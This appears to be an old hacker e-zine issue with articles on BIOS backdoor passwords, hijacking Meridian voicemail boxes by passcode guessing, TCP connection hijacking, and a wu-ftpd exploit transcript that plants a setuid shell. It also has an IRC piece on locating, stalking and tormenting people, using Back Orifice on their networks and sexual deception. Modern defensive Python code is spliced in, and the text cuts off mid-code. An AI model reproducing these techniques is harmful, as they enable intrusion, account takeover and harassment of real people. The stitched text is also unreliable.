=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                              >> pluk #02 <<
                      >> http://www.pluk.cjb.net <<
                  > - who said anything about the A-Team?
                  > - yeahyeahyeah okokok
                  > ...pimpin ain't EZ!@!
±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±
±                                                                             ±
±                              >> pluk 02 <<                                  ±
±                                 ^^^^^^^                                     ±
±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±

Table (read life)
Metal coloured shiny smooth
Wide flat harsh table top
Central curved feminine stand
Operating table, medical table
And on that table.....

Man (read mankind)
Flat out and naked
Statuesque in stillness
And magnificence
Everyman
And on that man....

Electrodes (read judgement)
Wires metal insulated
Patches attached
Electrical impulses
Lifesucking intensity
And at the end of the wires....

Screen (read verdict)
"fatal network error. Please try again."
±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±
±                              >> Contents <<                                 ±
±=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=±
± Group / Site News..................................................pluk ±
± General News / Info................................................pluk ±
± BIOS Backdoor Passwords.......................................The Nommo ±
± HaXoring Meridian Mail..........................................mrsp00n ±
± A quick and dirty introduction to TCP/IP...........................squi ±
± Social Engineering / Stalking over IRC..........................despair ±
± Basic Security Concepts........................................insanity ±
± Nuking and other Windoesn't Security Problems.....................drag0 ±
± A dog in the library (Egy kutya a kunyvtarba).....................Jézus ±
± PLUK Hitlist.......................................................squi ±
±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±

HI. Hello, etc. Whew. Welcome to issue 02. Thanks to everyone who sent us
articles/news/other neat stuff; we're always happy to get some kind of feedback.
Thanks to (anon) for the opening poem "readme".

--pluk

>> Group / Site News <<
^^^^^^^^^^^^^^^^^^^^^^^

+ Sorry about the delay with pluk.net - we really need to get off our asses and
  do something about it. On Xoom, the site loads slower than old people fuck.
  If it all goes to plan, division will be hosting us on his box via a
  cable-modem connection.

+ We've added another loser [Philip Hardcastle] to our Loser List. We need more
  losers. Send us your losers. Word.

>> General News / Info <<
^^^^^^^^^^^^^^^^^^^^^^^^^

+ Ever seen those bigass traffic cameras? The major design fault with early
  speed cameras was that they ran out of film, so they made digital cameras
  with SCSI hard drives inside. Although the actual size isn't known, the drive
  would have to be large enough to hold approximately 6 months' worth of
  traffic photos.
  We obviously cannot condone the further (probably illegitimate) investigation
  into this, and it'd be pretty safe to assume the Department of Transport
  would be less than amused if you stole one of their cameras.. ;)

+ http://www.stand.org.uk/ - Adopt your MP. Fight government proposals to limit
  the use of encryption by educating them with the relevant information the
  spin-doctors fail to provide. Check out the site and adopt your MP.

+ Free Stuff!! Get yourname@penis.com email fwd @ http://getmail.penis.com !

±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±
                      "WHAT FUCK!" lol "BOX NO BOOT!"
±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±
±                      >> BIOS Backdoor passwords <<                          ±
±                 >> by The Nommo [thenommo@mailcity.com] <<                  ±
±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±

By now you should all know that BIOS passwords are not exactly top-security.
BIOS password crackers are nice little utilities, and might be handy if you are
lucky enough to actually be inside the system, but how do you get inside it in
the first place?

Luckily, the stingy BIOS manufacturers have implemented backdoor passwords to
save money when people phone up telling them that they've forgotten their
password, so all they have to do is to type in these special codes, and they
will get through the password screens and can change their old password.

BIOS passwords will keep those honest people out but provide no protection
against dishonest (I'd rather say curious) ones. Ahem.

On to those <0D3z: I will only give you the most common manufacturers'
backdoors; for others, have a search on the 'net.

NB. These are all case sensitive, so type carefully. And when you're finished,
don't change the original passwords for the user, that's plain lame...

AMI BIOS:
---------
AMI
AMI_SW
AMI?SW
A.M.I.
BIOS
HEWITT RAND
LKWPETER
PASSWORD
589589 (AmiBIOS 4.5x)

AWARD:
------
589589
589721
ALFAROME
aLLy
AWARD_SW
AWARD_PW
AWARD?SW
awkward
BIOSTAR
j256
j262
HLT
lkwpeter
LKWPETER
SER
SKY_FOX
Syxz      <- Nice

Others:
-------
Phoenix also have backdoors - can't remember them off-hand.

Can't remember what these work for, but try them out if desperate:
condo, djonet, lkwpeter, biostar, biosstar

IBM Aptivas can be cleared by holding down both mouse buttons at boot-up until
the computer boots. Toshiba laptops can bypass the password by holding down the
left shift key during boot-up.

If none of this works, on some computers, flooding the keyboard buffer will
crash the password routine and allow the computer to boot. That means you keep
hitting ESC at the password prompt. This may require 50 to 100 presses, and may
not work in all machines, but it's worked before, and is worth a try.

The other method is to short the jumper on the motherboard by touching both the
wires together for about 10 seconds. Some motherboards get damaged if you do
this when it is on, so I suggest you do it with the computer turned off. Remove
the jumper, turn the 'puter on, then if that fails turn the computer on with
the jumper in place. This will clear ALL the CMOS settings, so only do it when
in dire need or when you know all the correct CMOS settings and have them
written down. Better safe than sorry!

From this, I hope you have learnt that BIOS passwords aren't exactly the safest
thing in the world! If one person learns one thing from this article then I
have done my job!

±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±
±                          HaXoring Meridian Mail                             ±
±                  >> by mrsp00n [mrsp00n@phreaker.net] <<                    ±
±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±

Ahhhhh....Voicemail. Want your own 31337 Voicemail Account? This issue, I'm
going to be looking at getting a Voicemail box on Meridian Mail [0800 318 716].
The legitimate mailbox owner would call Meridian Mail and, at the voice prompt,
enter their 6-digit mailbox number, followed by their "passcode" [these can be
any length between 4 and 12 digits]. Once they have accessed their mailbox,
they can hear any messages that have been left for them, change their options
and/or send messages to other mailboxes.

Now, when the mailboxes are created, the default passcode is the same as the
box number. [Can you see where we're going?] So, if you've got no life like me,
you can [theoretically] stand in a phonebox and haXor away at the keypad till
either:

  a) your fingers fall off, or
  b) you find an unused box

Obviously, we're aiming for the latter option...

Another option would be to pick the box you want, and attempt to, uhm, "borrow"
it from the rightful owner. Morally wrong? Yea, maybe, but you're the 31337
über-haXor, so morals don't stand in your way, right? Damn straight.

There are two basic ways to do this, without making it a life mission:

  a) know the person, and bring it up in conversation: "So, uh, Meridian Mail..
     you've got a mailbox there, right? Yea? What's your passcode?" [Yea, I'm
     the Messiah of social-engineering..]

  b) take lucky guesses at the passcode. After all, you get 10 guesses at the
     passcode before the mailbox dies [it then has to be re-activated by the
     system manager]. So, try it on someone you hate, and if you don't get
     their passcode, at least you've fucked their mailbox and caused them some
     hassle.

If you *do* succeed in owning someone's box, then you can impress all your
warez pup friends with your newly-discovered skillz!

Seriously, though, don't abuse Meridian Mail for lame shit like that, because
the boxes tend to be used for business, both legitimate and illegitimate. If
you do it, keep your number quiet, and use it as a last resort, eh?

[Although it's pretty fuckin rare, you occasionally get boxes that can dial out
to any number you want.
So, since you've only dialled into an 0800 number, you get free phonecalls!
w00p! Now you can d/l all your lesbian pr0n for free!]

±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±
±                  A quick and dirty introduction to TCP                      ±
±                      >> by squi [squi@penis.com] <<                         ±
±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±

TCP/IP/UDP/ICMP/etc.. the basic fibres of the world's networks. Quietly working
away in the background, transparent to those who use them every day - yet so
fundamental in the exchange of data, information, ideas, lesbian porn. But what
the fuck are they? What do they do? How are they related? What are the security
issues surrounding them? Why do pockets always get caught on door handles?

I'll attempt to answer some TCP related questions in this issue. For now, let's
start with some definitions for the acronyms/abbreviations I'll be using.

TCP      - Transmission Control Protocol.
IP       - Internet Protocol.
SVR_SEQ  - Sequence number of the next byte to be sent by Roy.
SVR_ACK  - Next byte to be received by Roy (or the sequence number of the last
           byte received +1).
SVR_WIND - Roy's receive window.
CLT_SEQ  - Sequence number of the next byte to be sent by Bob.
CLT_ACK  - Next byte to be received by Bob.
CLT_WIND - Bob's receive window.
ROY      - Our friendly and company-image-minded Dixons Ltd employee. Server.
BOB      - McDonalds caretaker, 3 stars, balding, good with kids. Client.

See? Easy peasy.

Imagine TCP/IP networking as a series of layered protocols - a base protocol on
which the others sit whilst performing their respective functions. For TCP/IP,
the "stack" of protocols is based around IP. IP is the non-reliable,
non-connection-orientated protocol that sits at the bottom. Its function is
simply to route the flow of data. It has 32-bit header fields which contain
address information, and is generally the busiest protocol in the TCP/IP stack.
There is no accountability for data thrown about by IP; for this, it relies on
TCP...

TCP provides a reliable, accountable connection between 2 entities. Every byte
that is sent is marked with a sequence number of 32 bits, and is acknowledged
(ACK) by the receiver using this previously assigned number. The sequence
number for the first byte sent is computed during the connection opening. It
changes for any new connection based on rules designed to avoid re-use of the
same sequence number for two different sessions of a TCP connection.

Initially, no data has been exchanged. Roy has none of Bob's porn. This means:

  SVR_SEQ = CLT_ACK  and  CLT_SEQ = SVR_ACK

These equations are also true when the connection is in a 'quiet' state (no
porn being sent by either side). They are not true during states when data is
sent. The more general equations look like this:

  CLT_ACK <= SVR_SEQ <= CLT_ACK + CLT_WIND
  SVR_ACK <= CLT_SEQ <= SVR_ACK + SVR_WIND

Now, the TCP packet header fields are as follows:

  Source Port:           The source port number
  Destination Port:      The destination port number
  Sequence number:       The sequence number of the first byte in this packet
  Acknowledgment Number: The expected sequence number of the next byte to be
                         received
  Data Offset:           Offset of the data in the packet
  Control Bits:
    URG: Urgent Pointer
    ACK: Acknowledgment
    PSH: Push Function
    RST: Reset the connection
    SYN: Synchronize sequence numbers
    FIN: No more data from sender
  Window:                Window size of the sender
  Checksum:              TCP checksum of the header and data
  Urgent Pointer:        TCP urgent pointer
  Options:               TCP options

SEG_SEQ will refer to the packet sequence number (as seen in the header).
SEG_ACK will refer to the packet acknowledgment number. SEG_FLAG will refer to
the control bits. On a typical packet sent by Bob to Roy, SEG_SEQ is set to
CLT_SEQ, SEG_ACK to CLT_ACK.

Heard of the famous "3 way handshake"? It goes a little like this:

  Y0 R0y. Sup dude. Send me some data, I'm listenin'
  y0 b0b. Sup.
  here's muh data: "Gimme axS to j0r pr0n."
  sure dude, I ackn0wledge j00 wanna whack off, come on in.

Something like that anyway. Maybe a little bit more complicated, but I really
can't be bothered transcribing a whole metaphorical handshake using
pr0npup-speak. Um. Yeah. Anyway.

If we suppose that Roy initiates the connection to Bob and that no data is
exchanged, the normal packet exchange is as follows:

* The connection on the client side (Roy) is in the CLOSED state.
* The one on the server side (Bob) is in the LISTEN state.
* Roy first sends his initial sequence number and sets the SYN bit, so:

    SEG_SEQ = CLT_SEQ_0, SEG_FLAG = SYN

  Its state is now "SYN-SENT".

* On receipt of this packet, Bob acknowledges Roy's sequence number, sends his
  own initial sequence number and sets the SYN bit:

    SEG_SEQ = SVR_SEQ_0, SEG_ACK = CLT_SEQ_0+1, SEG_FLAG = SYN

  and sets SVR_ACK = CLT_SEQ_0+1. Its state is now "SYN-RECEIVED".

* On receipt of this packet, Roy acknowledges Bob's sequence number:

    SEG_SEQ = CLT_SEQ_0+1, SEG_ACK = SVR_SEQ_0+1

  and sets CLT_ACK = SVR_SEQ_0+1. Its state is now "ESTABLISHED".

* On receipt of this packet, Bob enters the "ESTABLISHED" state.

We now have:

  CLT_SEQ = CLT_SEQ_0+1
  CLT_ACK = SVR_SEQ_0+1
  SVR_SEQ = SVR_SEQ_0+1
  SVR_ACK = CLT_SEQ_0+1

  Server (Bob)                                   Client (Roy)

  LISTEN                                         CLOSED
                      <- SYN, CLT_SEQ_0
  LISTEN                                         SYN-SENT
  SYN, SVR_SEQ_0, CLT_SEQ_0+1 ->
  SYN-RECEIVED                                   ESTABLISHED
  SVR_ACK = CLT_SEQ_0 + 1                        CLT_ACK = SVR_SEQ_0 + 1
                      <- ACK, CLT_SEQ_0 + 1, SVR_SEQ_0+1
  ESTABLISHED
  SVR_SEQ = SVR_SEQ_0 + 1
  SVR_ACK = CLT_SEQ_0 + 1

Nifty, huh? That's basically all there is to it. Bob can transfer his lesbian
porn to Roy after an easy, split second TCP conversation.

Security wise, there are many colourful ways to exploit TCP/IP - especially in
the UNIX world where trust relationships between entities are common.
TCP/IP can be fooled by hundreds of methods which are way beyond the scope of
this article, although there are more simple and straightforward ways to bypass
security such as S/Key or Kerberos one-time password/ticketing authentication.

[EXAMPLE TIME. PHEER. ;) =] 8Þ :\ :0]

One such attack consists of creating a desynchronized state - simply the state
of a connection when both sides are in the ESTABLISHED state, no data is being
sent (stable state), and:

  SVR_SEQ != CLT_ACK
  CLT_SEQ != SVR_ACK

This connection state, when existing on both sides of the TCP connection,
simply dictates that the two points cannot exchange data any longer. A third
party host is then used to create acceptable packets for both ends which mimic
the real packets.

Now, let's assume that the connection is desynched, and Roy transmits a packet:

  SEG_SEQ = CLT_SEQ
  SEG_ACK = CLT_ACK

Since CLT_SEQ != SVR_ACK, the data within Roy's packet will be rejected and the
packet dropped. The third party then sends the SAME packet, but changes the
SEG_SEQ and SEG_ACK (and also the checksum) so that:

  SEG_SEQ = SVR_ACK, SEG_ACK = SVR_SEQ

Bob accepts this packet because ummm he just does, ok? The packet is acceptable
and is processed accordingly.

Now, if CLT_TO_SVR_OFFSET refers to SVR_ACK - CLT_SEQ and SVR_TO_CLT_OFFSET
refers to CLT_ACK - SVR_SEQ, the attacker has to rewrite the TCP packet from
the client to the server as:

  SEG_SEQ <- SEG_SEQ + CLT_TO_SVR_OFFSET
  SEG_ACK <- SEG_ACK - SVR_TO_CLT_OFFSET

On the basis that the attacker can listen to any packet shifted through the
conversation, and can forge any kind of IP packet (effectively masquerading as
the client OR the server), the whole process will behave as if the connection
is actually routed through the attacking machine. Ninjitsu. HuYAH. Hyeeoorrr.
Etc.

Have a little think. You can now add or remove ANY data to this particular
stream. Lovely. Penny dropped?
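To make the sequence/acknowledgement bookkeeping above concrete, here is a small added example (written for this edit, not code from squi or from the pluk zine) that models both endpoints in Python. It runs the three-way handshake using the article's CLT_*/SVR_* names, checks the two general inequalities, and then shows what a desynchronised connection looks like from the receiving side: every further segment from the peer is dropped because its SEG_SEQ no longer matches what the receiver expects, and a drop counter on the receiver is the simplest indicator that a connection has fallen into that state. The `Endpoint` class, the `desync()` helper and the sequence numbers are constructed for illustration; real stacks use randomised 32-bit ISNs and queue early in-window segments rather than dropping them. The article's definition list makes Roy the server and Bob the client, while its handshake walkthrough swaps the two; the code follows the definition list.

```python
"""Added example: toy model of TCP sequence/ack bookkeeping.

Names follow the article's definitions: Roy is the server (SVR_*), Bob is
the client (CLT_*). snd_nxt plays SVR_SEQ/CLT_SEQ, rcv_nxt plays
SVR_ACK/CLT_ACK. All numbers are small constructed values, not real ISNs.
"""
from dataclasses import dataclass, field

MOD = 2 ** 32  # sequence numbers live in a 32-bit space


@dataclass
class Segment:
    seq: int            # SEG_SEQ
    ack: int            # SEG_ACK
    flags: frozenset    # SEG_FLAG
    data: bytes = b""


@dataclass
class Endpoint:
    name: str
    wind: int = 4096          # receive window (SVR_WIND / CLT_WIND)
    state: str = "CLOSED"
    snd_nxt: int = 0          # next byte we will send (SVR_SEQ / CLT_SEQ)
    rcv_nxt: int = 0          # next byte we expect    (SVR_ACK / CLT_ACK)
    received: bytearray = field(default_factory=bytearray)
    dropped: int = 0          # segments rejected because SEG_SEQ was wrong

    def deliver(self, seg: Segment) -> bool:
        """Receiver-side acceptability check (toy rule: the segment must
        start exactly at rcv_nxt). A real stack also queues in-window
        segments that arrive early, but anything outside the window is
        dropped just like here, which is why a desynchronised peer can no
        longer get data through."""
        if seg.seq != self.rcv_nxt:
            self.dropped += 1
            return False
        self.received += seg.data
        self.rcv_nxt = (self.rcv_nxt + len(seg.data)) % MOD
        return True


def handshake(client_isn: int, server_isn: int, wind: int = 4096):
    """Three-way handshake; returns (client, server) both in ESTABLISHED."""
    client = Endpoint("Bob (client)", wind=wind, snd_nxt=client_isn)
    server = Endpoint("Roy (server)", wind=wind, snd_nxt=server_isn, state="LISTEN")

    # 1. client -> server: SEG_SEQ = CLT_SEQ_0, SEG_FLAG = SYN
    syn = Segment(seq=client.snd_nxt, ack=0, flags=frozenset({"SYN"}))
    client.snd_nxt = (client.snd_nxt + 1) % MOD   # the SYN occupies one sequence number
    client.state = "SYN-SENT"

    # 2. server -> client: SEG_SEQ = SVR_SEQ_0, SEG_ACK = CLT_SEQ_0 + 1
    server.rcv_nxt = (syn.seq + 1) % MOD          # SVR_ACK = CLT_SEQ_0 + 1
    synack = Segment(seq=server.snd_nxt, ack=server.rcv_nxt,
                     flags=frozenset({"SYN", "ACK"}))
    server.snd_nxt = (server.snd_nxt + 1) % MOD
    server.state = "SYN-RECEIVED"

    # 3. client -> server: SEG_SEQ = CLT_SEQ_0 + 1, SEG_ACK = SVR_SEQ_0 + 1
    client.rcv_nxt = (synack.seq + 1) % MOD       # CLT_ACK = SVR_SEQ_0 + 1
    ack = Segment(seq=client.snd_nxt, ack=client.rcv_nxt, flags=frozenset({"ACK"}))
    client.state = "ESTABLISHED"
    if ack.ack == server.snd_nxt:                 # server checks the ACK before moving on
        server.state = "ESTABLISHED"
    return client, server


def _within(low: int, x: int, span: int) -> bool:
    """low <= x <= low + span, evaluated modulo 2^32."""
    return (x - low) % MOD <= span


def invariants_hold(client: Endpoint, server: Endpoint) -> bool:
    """The article's general equations:
       CLT_ACK <= SVR_SEQ <= CLT_ACK + CLT_WIND
       SVR_ACK <= CLT_SEQ <= SVR_ACK + SVR_WIND"""
    return (_within(client.rcv_nxt, server.snd_nxt, client.wind)
            and _within(server.rcv_nxt, client.snd_nxt, server.wind))


def send_data(sender: Endpoint, receiver: Endpoint, data: bytes) -> bool:
    """Build a data segment as the article describes (SEG_SEQ = own SEQ,
    SEG_ACK = own ACK) and hand it to the receiver."""
    seg = Segment(seq=sender.snd_nxt, ack=sender.rcv_nxt,
                  flags=frozenset({"ACK", "PSH"}), data=data)
    sender.snd_nxt = (sender.snd_nxt + len(data)) % MOD
    return receiver.deliver(seg)


def desync(endpoint: Endpoint, shift: int) -> None:
    """Constructed stand-in for whatever knocked the two sides out of step:
    afterwards the endpoint expects a sequence number its peer will never
    send (SVR_ACK != CLT_SEQ), so the peer's segments are dropped."""
    endpoint.rcv_nxt = (endpoint.rcv_nxt + shift) % MOD


if __name__ == "__main__":
    bob, roy = handshake(client_isn=100, server_isn=300)
    print(bob.state, roy.state, invariants_hold(bob, roy))      # ESTABLISHED ESTABLISHED True
    print(send_data(bob, roy, b"hello"), bytes(roy.received))  # True b'hello'
    desync(roy, 5000)
    print(invariants_hold(bob, roy), send_data(bob, roy, b"again"), roy.dropped)  # False False 1
```

Once `desync()` has shifted Roy's expectation, `invariants_hold()` goes false and Bob's segments are counted in `roy.dropped` instead of being delivered; that is the "cannot exchange data any longer" state the article describes, and a steady stream of such rejects (often visible as an ACK storm on the wire) is what a sensor would look for.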
For the less imaginative among you, take the rlogin via telnet scenario - the
attacker can include any command which the server will assume to have been
initiated by the client... think of the possibilities =]

I realise I suck dick, and stuff in my article is probably ambiguous/boring and
stuff; but if I got any of this wrong, or you want to point out how much my m0m
blows, feel free to go die or something. Else mail me at squi@penis.com.

±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±
±               >> Social Engineering / Stalking over IRC <<                  ±
±                  >> by despair [despair@mailcity.com] <<                    ±
±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±

Hello. You don't know me...probably never will. It's not necessary. Who I am
isn't important. Call me despair if you want. I just represent a group of
people. The intellectual mafia, let's call them. The intellectual mafia doesn't
have any purpose as such....it just serves its own purposes.

I don't function for any reason other than to please myself. What I do is
selfish, I admit that. Occasionally I'll do something for other people.
Favours, things for friends. Otherwise what I do, I do to keep myself amused.
To keep the wheels turning in my head. Otherwise I'd get very bored.

I suppose I should tell you what I do. When I'm bored I fuck with people's
heads. Before you start hating me, think about it. You do the same every day.
I just do it more often and to people who...for the most part deserve it. Well,
I think they deserve it, and I'm the only person I have to answer to.

When people fuck with me, I fuck with their heads. Fair's fair. You piss me
off. You get fucked in the head. Of course it works better the more ignorant
the person is. Come up against another of the intellectual mafia and it's a
very frustrating fight, but there are always ones to make up for that.

Social Engineering is like sex. In order for it to be good you need a lot of
foreplay.
Bad social engineers and sexual partners alike rush in without enough
preparation. The key to fucking with people's heads is preparation. Work out a
plan in advance. Think of the battle plan and try to imagine all eventualities.
It's like a game of chess.

Before you start fucking with someone's head...you've got to do some background
digging..now in some cases this may be impossible...if they're on a dynamic IP
for example and have no other distinguishing features...if so...you can always
just go for a brute force out-argue/out-swear them.

Now...comes the tasty bit.. if they have a fixed IP or at least an IP that you
can find stuff about them from. Take for example an IP like this:

  ~user@ac3-3537.csv.shu.ac.uk

Now....this is a jewel of an IP... you can see instantly that they go to an
English university or academic institution. Now...that's all very well...
BUT...you can learn more..you're just a few keystrokes and a browser away from
knowing where they are:

  www.shu.ac.uk

Bingo. Sheffield Hallam University...you know exactly where they are..then if
you want to be even more clever...you'd try and figure out what course they're
on by the csv. In this case..you can't find much out as to what it is. But in
other cases it's very obvious what they're studying...

  ~hehe@ppgc20.ph.man.ac.uk

Now...you'd deduce that this was someone studying physics at Manchester
University in England. Easy eh?

Well I've done fun things with university students...like checking on their
websites for their webmaster's email address...then pretending I'm female and
at their university...then telling them to send me an explicit email with their
room number (to their webmaster's address) and I'll come round and have sex
with them..

Ok..so that's mean...he never came back on IRC...but he *was* pissing me off
something wicked....kept on asking for cybersex and if I'd fuck him. I fucked
him alright.

Now...the challenging bit... Numeric IP addresses.
Sometimes you can't do anything with them...but sometimes if you're lucky...you
can...and then it's even more satisfying coz no-one else can figure out how you
knew what you know..

Method 1: try the now-outdated NetBus or Back Orifice..if not on their IP..then
the subnet that they're on..sometimes another computer will be infected and
will have info on the network they're on...I've found out LOADS of info from
one school once....all the teachers' and students' directories networked and
through BO I could reel off a list of teachers' names to the kid I was fucking
with.

Method 2: more satisfying if it works. Shove IPs into your browser. The one
you're trying to find first of all..then if that doesn't work...the ones at the
beginning of the subnet: eg 194.168.91.167 - you'd take a look at 194.168.91.1
then try 2, 3, etc. In this case it won't work...but sometimes you'll get lucky
and find the home page of wherever they are.

If that doesn't work....then try telnetting to their IP, then the IPs at the
beginning of the subnet...often you'll find their mail server or something
that'll give away the name of their organisation or school or whatever. Take
this for example:

  194.238.147.162

now....it won't resolve to a hostname.. BUT... try the beginning of the subnet

  194.238.147.4

bingo...your victim goes to a school called Westminster. It's that simple...

Then...just make up a law that they're breaking...or something like that...say
you can see what they're doing...something to freak them out..fuck about.

That's it

be seeing you

despair

±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±
±                      >> Basic Security Concepts <<                          ±
±                 >> by insanity [insanity@angelfire.com] <<                  ±
±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-±

Contents
========

<- Introduction ->
<- Security holes/exploits ->
  -- ftp
  --- Rhosts
  ---- New IP security hole.
<- Identifies a UNIX password ->
  - The genuine article
  -- Shadowed
<- Thanks to & News ->
  - People who have helped me, and whom I respect
  -- My future web page

----------------
<=Introduction=>
----------------

Well, here I am sitting in front of my computer again. This time I have decided
to do something constructive, like write my own text. So here I am. It occurred
to me I had to write my first text when I logged into the guest account of
koan.happyhacker.org and saw so many people logged in. People who, like me, saw
the user & pass on the net. It seemed to me that people would rather harass
people on NGs for the user & pass than test the many backdoors your system
could have had. Newbies now-a-days seem to have less of a clue than newbies a
few years ago, and definitely a worse attitude. But anyway, me still being a
newbie myself I thought I would share what I have learned.

I'm sure most of the topics here will have been covered in numerous other
texts, but I hope to add a new spin to what would be considered boring texts,
so those of you 'elitists' who are offended by this look away now. The fact is
this text has plenty of UNIX commands and stuff, and is based on the knowledge
the user has a shell. This isn't configuring your logo.sys file.

This is my first text so if anything is out of date etc give me a break :-).
Please send all flames to kinetix@angelfire.com .

----------- ----- --- -----------
<= Security Holes and Exploits =>
----------- ----- ---- ----------

I will do this from an admin's point of view to keep it official like. So
please read between the lines.

--> Ftp <--

So what's FTP? FTP stands for File Transfer Protocol. Ftp requests are answered
by wuarchive's ftpd (usually). Versions below 2.2 of this daemon have a
weakness through which you can execute any binary you can see with the
'site exec' command.

[admin note] Anonymous FTP can be a valuable service if correctly configured
and administered.
FTP daemon sites should ensure that they are using the most recent version of
their FTP daemon. (www.tucows.com?) The anonymous FTP root directory, which is
usually ~ftp, and each of its subdirectories should definitely not be owned by
the ftp account or be in the same group as the ftp account. This is probably
the most common configuration problem. If any of these directories are owned by
ftp or are in the same group as the ftp account and are not 'write protected',
a hacker would easily be able to add files, such as a .rhosts file (explained
below), or modify other files. Many sites find it acceptable to use the root
account. Making the ftp root directory and its subdirectories owned by root,
part of the system group, and protected so that only root has write permission
will help to keep your anonymous FTP service secure.

So what's the exploit? A sample exploit (courtesy of a text by the voyager) of
which you can execute a binary is shown below:-

Login to the system via ftp:

  220 uswest.com FTP server (Version wu-2.1(1) ready.
  Name (uswest.com:waltman): waltman
  331 Password required for waltman.
  Password: jim
  230 User waltman logged in.
  Remote system type is UNIX.
  Using binary mode to transfer files.
  ftp> quote "site exec cp /bin/sh /tmp/.tno"
  200-cp /bin/sh /tmp/tno
  ftp> quote "site exec chmod 6755 /tmp/.tno"
  200-chmod 6755 /tmp/tno
  ftp> quit
  221 Goodbye.

You see? Although there are not a lot of version 2.1 around, have a look. If I
ever did look (which I didn't) through a couple of systems last Saturday I
would have noticed more than one ftp system with this weakness. For more info
on exploits look at www.rootshell.com which is currently re-organizing after it
got hacked.

-=> Rhosts <=-

What are Rhosts? Let's take a look. On most (if not all) Unix machines,
services such as Rsh and Rlogin use a simple authentication method based on
hostnames that appear in .rhosts.

So what's the back door/exploit? Well I learned this one from the BUGTRAQ
mailing list.
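The admin note above gives two checks an administrator can script rather than eyeball: the anonymous FTP tree must not be owned by (or share a group with) the ftp account and must be writable only by root, and the .rhosts trust files just introduced must not contain '+' wildcard entries, since a '+' in the host or user field trusts every host or every user. The Python below is an added example written for this edit, not insanity's or Voyager's code; `audit_ftp_tree`, `scan_tree` and `rhosts_findings` are hypothetical names, the directory listing and .rhosts text are constructed samples, and uid 14 / gid 50 stand in for whatever the ftp account is on a real system (resolve them with the pwd and grp modules before calling `scan_tree` on a live tree).

```python
"""Added example: audit anonymous-FTP directory ownership and .rhosts
wildcards. Function names and sample data are constructed for this edit."""
import os
import stat
from collections import namedtuple

Entry = namedtuple("Entry", "path uid gid mode")   # mode: permission bits only


def audit_ftp_tree(entries, ftp_uid, ftp_gid):
    """Return [(path, [problems...])] for every entry that breaks the
    'owned by root, not in ftp's group, writable by root only' rule."""
    findings = []
    for e in entries:
        problems = []
        if e.uid == ftp_uid:
            problems.append("owned by the ftp account")
        if e.gid == ftp_gid:
            problems.append("in the ftp account's group")
        if e.mode & (stat.S_IWGRP | stat.S_IWOTH):
            problems.append("writable by group or others")
        if problems:
            findings.append((e.path, problems))
    return findings


def scan_tree(root):
    """Collect Entry records for a real directory tree (needs read access
    to the tree; not exercised by the constructed sample below)."""
    entries = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for path in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
            st = os.lstat(path)
            entries.append(Entry(path, st.st_uid, st.st_gid, stat.S_IMODE(st.st_mode)))
    return entries


def rhosts_findings(text):
    """Flag .rhosts lines that trust more than one named host/user.
    Line format is 'host [user]'; '+' in either field is a wildcard, so
    '+ +' lets anyone from anywhere rlogin/rsh in without a password."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts:
            continue
        host = parts[0]
        user = parts[1] if len(parts) > 1 else None
        if host == "+" and user == "+":
            findings.append((lineno, "any user from any host"))
        elif host == "+":
            findings.append((lineno, "any host for user %s" % (user or "<same name>")))
        elif user == "+":
            findings.append((lineno, "any user from host %s" % host))
    return findings


# Constructed sample: uid 14 / gid 50 stand in for the ftp account.
FTP_UID, FTP_GID = 14, 50
SAMPLE_TREE = [
    Entry("/home/ftp",          0,  0,  0o755),  # fine: root, system group, root-only write
    Entry("/home/ftp/pub",      0,  0,  0o755),
    Entry("/home/ftp/incoming", 14, 50, 0o777),  # classic mistake: ftp-owned, world-writable
    Entry("/home/ftp/bin",      14, 0,  0o755),  # owned by ftp even though not writable
]
SAMPLE_RHOSTS = "trusted.example.org\ntrusted.example.org bob\n+ +\n+ alice\n"

if __name__ == "__main__":
    for path, problems in audit_ftp_tree(SAMPLE_TREE, FTP_UID, FTP_GID):
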